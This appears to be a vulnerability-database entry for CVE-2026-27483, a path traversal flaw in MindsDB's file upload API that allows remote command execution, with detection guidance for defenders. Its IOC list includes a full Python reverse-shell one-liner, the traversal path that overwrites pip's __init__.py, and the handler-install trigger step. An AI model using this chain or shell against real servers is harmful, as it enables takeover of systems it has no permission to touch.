cbcvebase.
CVE-2026-27483
published 2026-02-24

CVE-2026-27483: MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.9.1.1, there is a path traversal vulnerability in…

PriorityP179high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
11.11%
95.4th percentile
MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.9.1.1, there is a path traversal vulnerability in Mindsdb's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution. The vulnerability exists in the "Upload File" module, which corresponds to the API endpoint /api/files. Since the multipart file upload does not perform security checks on the uploaded file path, an attacker can perform path traversal by using `../` sequences in the filename field. The file write operation occurs before calling clear_filename and save_file, meaning there is no filtering of filenames or file types, allowing arbitrary content to be written to any path on the server. Version 25.9.1.1 patches the issue.

Affected

2 ranges
VendorProductVersion rangeFixed in
mindsdbmindsdb< 25.9.1.125.9.1.1
mindsdbmindsdb>= 0 < 25.9.1.125.9.1.1

Detection & IOCsextracted from sources · hover to see the quote

urlPUT /api/files/{{filename}}
path/api/files
path/api/login
path/api/status
path/api/handlers/anomaly_detection/install
path../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py
port47334
commandimport os,pty,socket s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("{lhost}",{lport})) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) pty.spawn("/bin/sh")
  • Detect multipart PUT requests to /api/files/* where the filename field in the Content-Disposition header contains path traversal sequences (../).
  • Alert on PUT /api/files requests where the multipart filename parameter resolves to a path outside the intended upload directory, especially targeting Python site-packages (e.g., pip/__init__.py).
  • Monitor for a POST to /api/handlers/<handler>/install returning HTTP 500 with body containing 'Failed to install dependencies' shortly after a suspicious PUT /api/files upload — this two-step sequence is the RCE trigger pattern.
  • Flag HTTP 400 responses containing 'Not supported format' from /api/files PUT requests as a successful path-traversal payload upload indicator (the exploit treats this as upload success).
  • Insikt Group created a Nuclei template for CVE-2026-27483; defenders can use it to identify vulnerable MindsDB instances (versions >= 25.4.1.0 and < 25.9.1.1).
  • Check the /api/status endpoint response for 'mindsdb_version' to fingerprint vulnerable instances; versions matching >= 25.4.1.0 and < 25.9.1.1 are exploitable.
  • ·The path traversal payload specifically targets the Python venv pip package path (venv/lib/python3.10/site-packages/pip/__init__.py) to achieve RCE via handler install; the exact path may vary depending on the server's Python version and venv layout.
  • ·Version 25.9.1.1 patches the issue; the PoC explicitly aborts if the detected version is >= 25.9.1.1.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.